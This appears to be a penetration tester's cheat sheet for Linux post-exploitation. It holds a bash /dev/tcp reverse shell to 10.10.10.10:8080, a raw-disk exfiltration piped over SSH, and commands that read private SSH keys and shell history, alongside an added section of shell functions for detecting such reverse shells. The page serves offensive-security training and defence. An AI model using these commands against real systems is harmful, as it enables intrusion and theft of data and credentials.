# Linux Post Exploitation Discovery

## Linux Post Exploitation Discovery

### Description

### Techniques

### Resources

* Identify current user ID and privileges
* Identify network connections (for lateral movement)
* Identify running processes
* Identify cron jobs/scheduled tasks
* If it is an Active Directory environment, identify users/groups/computers, and whether it is in the cloud or on-prem
* If not AD, then find applications, firewalls, AV

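The same first checks from a Windows command prompt (these are Windows commands, not Linux ones):

```bat
whoami /priv
netstat -na | findstr "ESTABLISHED WAITING"
arp -a
systeminfo | findstr "Domain"
```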

* <https://github.com/Arr0way/linux-local-enumeration-script>

## Linux Exploits

### Commands

Expose a TCP port that listens on an IPv6 address through a local IPv4 listener on the same port.

```shell
IPV6ADDR=fc00:660:0:1::46 && PORT=110 && socat TCP-LISTEN:$PORT,reuseaddr,fork "TCP6:[$IPV6ADDR]:$PORT"
```

Find Juicy Stuff in the File System

```shell
find /PATH/TO/DIRECTORY -name "FILE-FILTER" -type f -exec grep -i "STRING" {} \; -print 2>/dev/null
```

Find public IP

```shell
curl -4 icanhazip.com
```

Make output easier to read

```shell
alias ccat='pygmentize -O bg=dark,style=colorful'
```

Encrypted Exfil channel

```shell
dd if=/dev/rdisk0s1s2 bs=65536 conv=noerror,sync | ssh -C user@10.10.10.10 "cat >/tmp/image.dd"
```

Check service every second

```shell
while (true); do nc -vv -z -w3 10.10.10.10 80 > /dev/null && echo -e "Service is up"; sleep 1; done
```

Website Cloner

```shell
wget -r -nH $URL
```

Type “gah” after you forgot to use sudo, and it’ll sudo your most recent command.

```shell
alias gah='sudo $(history -p \!\!)'
```

Create a reverse shell back to a given IP address and port.

```shell
bash -i >& /dev/tcp/10.10.10.10/8080 0>&1
```
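
Detecting the one-liner above, as an added example that is not part of the original page: the first function scans text (shell history, crontabs, scripts) for a redirection into `/dev/tcp`, the second checks whether a shell's standard streams are sockets. Function names and the sample history are constructed for illustration.

```shell
#!/bin/sh
# Added example: constructed sample data, hypothetical function names.

# Text scan. Reads stdin (shell history, crontabs, scripts) and prints
# "LINE HOST PORT" wherever a redirection targets /dev/tcp or /dev/udp.
# Redirections never reach argv, so `ps` alone shows only "bash -i".
scan_devtcp() {
    grep -nE '[<>&][[:space:]]*/dev/(tcp|udp)/[^/[:space:]]+/[0-9]+' |
    sed -E 's#^([0-9]+):.*[<>&][[:space:]]*/dev/(tcp|udp)/([^/[:space:]]+)/([0-9]+).*#\1 \3 \4#'
}

# Live check. Succeeds when fds 0, 1 and 2 in an fd directory (normally
# /proc/PID/fd) are all sockets, the state `>& ... 0>&1` leaves behind.
stdio_is_socket() {
    for fd in 0 1 2; do
        case "$(readlink "$1/$fd" 2>/dev/null)" in
            socket:*) ;;
            *) return 1 ;;
        esac
    done
    return 0
}

# Print PIDs of shells whose stdio is a socket (run as root to see all).
live_socket_shells() {
    for d in /proc/[0-9]*; do
        case "$(cat "$d/comm" 2>/dev/null)" in
            bash|sh|dash) stdio_is_socket "$d/fd" && echo "${d#/proc/}" ;;
        esac
    done
    return 0
}

# Constructed history excerpt: line 2 is the one-liner, line 3 is benign.
sample_history() {
    cat <<'EOF'
ls -la /tmp
bash -i >& /dev/tcp/10.10.10.10/8080 0>&1
grep -r "/dev/tcp" /var/log/audit
EOF
}

sample_history | scan_devtcp   # prints: 2 10.10.10.10 8080
live_socket_shells
```

A shell started over SSH or a local terminal has a pty on its standard streams, so a PID printed by `live_socket_shells` is worth a closer look rather than proof on its own.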

Encode or decode base64 information.

```shell
echo 'Hello, World!' | base64

echo 'SGVsbG8sIFdvcmxkIQo=' | base64 -d
```

### Helpful Commands

```shell
cat ~/.bash_history
cat ~/.ssh/config
cat ~/.ssh/id_rsa
cat ~/.ssh/known_hosts
```

### Linux Post Exploitation Tools

* BusyBox
* Nmap
* Responder.py
* tcpdump
* <http://www.monkey.org/~dugsong/dsniff/>
* <http://www.dest-unreach.org/socat/>
* <https://www.gnu.org/software/screen/>
* <http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html>
* <http://tgcd.sourceforge.net/>

### Resources

* [APT Privilege Escalation](https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation/)
